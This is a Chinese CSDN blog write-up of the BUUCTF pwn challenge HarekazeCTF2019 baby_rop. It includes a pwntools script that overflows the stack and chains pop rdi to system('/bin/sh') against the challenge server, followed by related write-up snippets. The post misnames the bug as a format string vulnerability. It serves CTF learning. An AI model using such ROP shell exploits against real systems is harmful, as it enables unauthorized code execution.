BUUCTF PWN [HarekazeCTF2019]baby_rop

最新推荐文章于 2025-09-02 02:41:02 发布

原创最新推荐文章于 2025-09-02 02:41:02 发布 · 409 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #pwn #python #linux #c语言

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

本文介绍了一个64位程序中的格式化字符串漏洞，并详细解释了如何利用此漏洞来执行系统命令。文中通过使用checksec工具检查程序的安全特性，并通过IDA逆向工程分析程序结构。最终通过构造特定的payload，利用ROP技术调用system函数执行/bin/sh命令。

1.checksec+运行

64位/NX堆栈不可执行

2.IDA进行中

1.main函数

本题函数倒不是很多

很明显,格式化字符串漏洞

2.system bin/sh

3.offset

总体来看64位寄存器传参

3.EXP

from pwn import*
 
p=remote('node4.buuoj.cn',27198)
 
shell=0x601048
system=0x400496
rdi=0x400683
 
payload=b'a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)
 
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[HarekazeCTF2019]baby_rop1

m0_64195960的博客

06-30

930

前言：有两个新的知识点，一个是寻找函数地址，一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数，我们通过shift+f12找一下字符串呜呜它给的实在太多了，有system函数，有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式（因为博主之前只会做那种白给后门函数的题，或者gdb找）注意：我们在这里不是嗯翻，一个程序plt装载的位置大概在灰色部分后面一点（具体原因就不展开啦）我们可以通过调上方彩色的部分来定位这个有点烦，但还是讲讲这样就可以直接获得的，比较发现

BUUCTF Pwn [HarekazeCTF2019]baby_rop2 题解

qq_33348179的博客

12-16

384

因为这是64位程序所以用寄存器传参；又因为printf得传至少2个参数所以要用到寄存器RDI RSI。查到的rsi多了个r15寄存器但不需要用到所以写payload的时候记得填充它。这里的打印函数是printf 所以利用printf函数的plt输出真实地址got。查看main函数看到给了个libc说明这题是ret2libc题。但printf的got好像不行所以换成了read的got。第一个rdi传入printf里的格式化字符串。下载得到两个文件 checksec。64位拖入IDA64。

参与评论您还未登录，请先登录后发表或查看评论

BUU-[HarekazeCTF2019]baby_rop

qq_45771413的博客

04-27

2079

查看保护 IDA scanf没限制输入长度，这里可以溢出v4 寻找system和敏感字符串：都找到了，看来可以缝合缝合了。解题这次还是rop，但是还是查阅了相关资料，比第一次做时理解要深刻点。也会用寻找ret返回的工具： ROPgadget ROP相关概念： ROP就是使用返回指令ret连接代码的一种技术（同理还可以使用jmp系列指令和call指令，有时候也会对应地成为JOP/COP）。一个程序中必然会存在函数，而有函数就会有ret指令。而ret指令的本质是pop eip，即把当前栈顶的内

[HarekazeCTF2019]baby_rop

最新发布

Xiiaogu的博客

09-02

226

只有NX保护机制打开。接着运行指令得到文件属性显示babyrop为64位可执行文件。

BUUCTF pwn [HarekazeCTF2019]baby_rop

菜的只能随便写写博客

02-13

2737

0x01 文件分析 0x02 运行一组回显 0x03 IDA 程序之中存在system函数，通过搜索字符串，还能得到’/bin/sh’字符串，一个简单的rop。 0x04 思路简单rop，利用万能的gadget，pop rdi ret传入字符串并调用system，得到shell。此题flag的位置在/home/babyrop内，可以通过find -name flag...

BUUCTF [HarekazeCTF2019]baby_rop

qq_51821131的博客

07-28

247

简单rop 分析程序存在栈溢出存在字符串binsh 找到返回地址代码如图，由于是64位，先通过寄存器传参，所以利用pop|ret 打通后发现flag文件不在根目录从而利用find -name flag，找到flag在/home/babyrop/flag中，cat一下即可 ...

[HarekazeCTF2019]baby_rop[BUUCTF]

moonlightsunshin的博客

05-05

564

这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。

buuctf|pwn-[HarekazeCTF2019]baby_rop-wp

l2645470582_的博客

11-08

323

1.例行检查我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件按shift+f12查看关键字符串，我们看到“/bin/sh”这个关键字符串我们双击查看它的位置:0x0601048 3.我们去main函数里面看看我们发现v4 = var_10，他的地址为：0x10 我们要拿到权限：system("/bin/sh") 所以我们要找到system地址：0x0400490 我们双击_system,system在plt表里面 4...

BUUCTF-[HarekazeCTF2019]baby_rop2

Rt1Text的博客

11-08

464

泄露libc基地址,计算system,bin/sh地址,覆盖返回地址。最后ls没有发现flag,寻找flag。还要注意64位传参,寄存器的使用。直接cat flag在的位置即可。

buuctf|[HarekazeCTF2019]baby_rop 1

m0_64236521的博客

05-02

1453

buuctf|[HarekazeCTF2019]baby_rop 1 分析下载文件重命名为pwn_15,checksec一下只开启了NX,64位，用ida看看这里可以栈溢出，同时在侧面看到了system() shift+F12查看字符串找到binsh，由于是64位，我们要寄存器传参，ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x

PWN——Buuoj [HarekazeCTF2019]baby_rop

u014377094的博客

01-21

797

先用IDA64打开，发现scanf看一眼存入数据的位置熟悉的味道按一下shift f12 system函数和/bin/sh都给了那就不客气了困难题我唯唯诺诺，简单题我重拳出击思路明确，现在还需要pop rdi，ret来传一下参数（str“/bin/sh）到system里这个时候用到了ROPgadget 里面的babyrop是这道题的文件名，其他题换一下就ok 现在找到了地址，准备工作完成，敲python 有一点需要注意的是，咱们明明找的是400683，搁ida里咋面目

HarekazeCTF2019 baby_rop

m0_73743784的博客

08-28

329

非常经典的 ROP。

buuctf [HarekazeCTF2019]baby_rop

carol2358的博客

04-17

490

可以在程序里找到binsh，ctrl+L, 程序本身有system函数找到rop 修改system参数为/bin/sh，然后跳转到system运行就可以了，最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop

mcmuyanga的博客

09-01

759

[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop 附件步骤：例行检查，64位，开启了NX保护试运行一下程序，看这个情况，当我们输入太长字符串的时候会报错 64位ida载入，shift+f12查看程序里的字符串，看到了system 和 ‘/bin/sh’ 双击跟进，ctrl+x查看一下哪里调用了字符串，没有找到函数，只找到了地址 shell=0x601048 system=0x400496 找到输入点，没有限制v4读入的数据，可以造成溢出，跟pwn16差不

HarekazeCTF2019_baby_rop

z1r0的博客

12-04

797

HarekazeCTF2019_baby_rop 查看保护溢出，有system和bin，rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file

buuctf [HarekazeCTF2019]baby_rop2

09-30

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中，主要的目标是获取read函数的地址，并利用该地址泄漏libc基址，然后计算system函数和/bin/sh字符串的地址，最终执行system('/bin/sh')获取...